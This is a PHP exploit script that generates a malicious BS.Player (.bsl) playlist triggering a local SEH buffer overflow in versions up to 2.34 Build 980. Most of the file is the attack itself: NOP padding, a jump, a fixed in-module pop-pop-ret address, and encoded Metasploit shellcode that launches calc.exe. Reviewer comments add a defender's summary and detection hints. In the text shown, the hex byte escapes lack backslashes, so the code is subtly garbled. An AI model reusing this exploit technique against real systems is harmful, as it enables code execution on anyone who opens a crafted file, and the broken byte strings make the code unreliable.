
# Title : BS.Player <= 2.34 Build 980 (.bsl) Local Buffer Overflow Exploit (SEH)
# Published : 2009-03-20
# Author : Nine:Situations:Group


<?php
/*
Bs.Player <= 2.34 Build 980 (.bsl) local buffer overflow 0day exploit (seh)
by Nine:Situations:Group::pyrokinesis

Overlong hostnames in bsplayer playlist files cause eax and the seh handler to be
overwritten. Cannot reliably debug with olly because of code compression, just
used faultmon/memdump/msfpescan and I chose the easy/universal way with seh.
There are some pop ret addresses in common among the vulnerable versions...

Well it says local but I consider it a remote one because .bsl files are
associated to the program
Tested and working against:

...
v2.32 Build 975 Free
v2.34 Build 980 PRO
win xp pro sp2 / sp3
win 2k3 sp1

not vulnerable:
v2.35 Build 985 PRO
V2.36 Build 990 Free/Pro


*/

/*
 * NOTE(review): this is a flat proof-of-concept generator, not a library.
 * The only thing it does is concatenate a fixed byte string and write it to
 * "evil.bsl" in the current working directory; it performs no network I/O.
 *
 * Defender's summary, grounded in the header above and the code below:
 *   - Trigger: a .bsl playlist whose host field is longer than the player
 *     expects, overwriting the SEH record (the author's description).
 *   - Affected: builds up to 2.34 Build 980; the author lists 2.35 Build 985
 *     and 2.36 Build 990 as not vulnerable, so updating the player is the fix.
 *   - Exposure: .bsl files are associated with the player, so opening a
 *     downloaded playlist is sufficient (the author's "remote" argument).
 *   - Detection: a playlist that is mostly non-printable, carries long runs of
 *     a single byte value (the 0x90 padding below), and exceeds any sane
 *     entry length; a media player spawning a child process (the payload here
 *     launches calc.exe) is a strong endpoint signal.
 *   - Hardening: the handler address points into bsplayer.exe itself; that
 *     presumably means the module lacks SafeSEH/ASLR-style protections --
 *     TODO confirm against the binary's linker flags.
 */

// Playlist header and the start of the host entry, as supplied by the author.
$buffer=
"x23x45x58x54x4dx33x55x0dx0ax23x45x58x54x49x4ex46".
"x3ax30x2cx41x41x41x41x0dx0ax68x74x74x70x3ax2fx2f".
"x52x61x77x2dx48x69x67x68x2e";

// Filler that pads the host field out to the SEH record. "BBBB"/"CCCC" are
// marker values, presumably used to locate the eax overwrite named in the
// header -- they are not needed for the crash itself.
$nop1=str_repeat("x90",384);
$eax_again="BBBB";
$nop2=str_repeat("x90",12);
$eax="CCCC";
$nop3=str_repeat("x90",8);
$jnk=$nop1.$eax_again.$nop2.$eax.$nop3;

// Short forward jump placed where the "next SEH" pointer lands; it skips the
// handler address that follows and continues into the padding/payload.
$jmp="xebx08x90x90";

// Handler address inside bsplayer.exe (author's annotation). Because it is a
// fixed in-module address, it is the part that only works on the listed builds.
$seh="xb1xadx41x00"; //0x0041adb1   pop pop ret bsplayer.exe

// Padding in front of the payload.
$nop4=str_repeat("x90",100);

// Payload as generated by the author's tool (see the line below): launches
// calc.exe -- the benign proof-of-concept action, nothing more.
// win32_exec -  EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
$scode=
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49".
"x49x49x49x49x49x49x49x49x49x37x49x49x51x5ax6ax47".
"x58x50x30x42x31x41x42x6bx42x41x57x32x42x42x42x32".
"x41x41x30x41x41x58x38x42x42x50x75x59x79x4bx4cx69".
"x78x37x34x67x70x45x50x75x50x6cx4bx61x55x45x6cx6e".
"x6bx71x6cx73x35x62x58x66x61x6ax4fx4cx4bx42x6fx56".
"x78x4cx4bx71x4fx77x50x57x71x6ax4bx72x69x6ex6bx75".
"x64x4ex6bx75x51x68x6ex30x31x59x50x4dx49x4cx6cx4f".
"x74x69x50x31x64x36x67x4fx31x4ax6ax44x4dx75x51x68".
"x42x38x6bx5ax54x35x6bx62x74x75x74x37x74x70x75x68".
"x65x4cx4bx51x4fx35x74x73x31x4ax4bx50x66x6cx4bx44".
"x4cx50x4bx6cx4bx41x4fx77x6cx34x41x7ax4bx6cx4bx67".
"x6cx6ex6bx37x71x6ax4bx4dx59x33x6cx71x34x54x44x39".
"x53x55x61x6fx30x41x74x6cx4bx37x30x70x30x6ex65x4b".
"x70x61x68x66x6cx6ex6bx61x50x36x6cx6ex6bx74x30x65".
"x4cx6ex4dx6cx4bx71x78x64x48x68x6bx76x69x6cx4bx4f".
"x70x48x30x75x50x75x50x55x50x4ex6bx63x58x67x4cx31".
"x4fx56x51x4ax56x53x50x41x46x4fx79x4bx48x4bx33x39".
"x50x61x6bx32x70x53x58x6cx30x4cx4ax65x54x53x6fx63".
"x58x7ax38x49x6ex4ex6ax54x4ex70x57x69x6fx58x67x62".
"x43x72x41x70x6cx70x63x43x30x47";

// Assemble the file: header, filler, jump, handler address, padding, payload,
// then the trailing bytes (ending in CRLF + NUL) that close the entry.
$buffer.=$jnk.$jmp.$seh.$nop4.$scode;
$buffer.=
"x56x37x2ex46x4dx2fx6cx69x73x74x65x6ex2ex70".
"x6cx73x0dx0ax00";

// Write the crafted playlist next to the script. The "@" operators silence
// warnings from fputs/fclose, so a short or failed write goes unreported; a
// reviewer would drop the "@" and check the return value of fputs instead.
$fp=fopen("evil.bsl","w+");
if (!$fp) {die("cannot create evil.bsl!");}
@fputs($fp,$buffer);
@fclose($fp);
?>
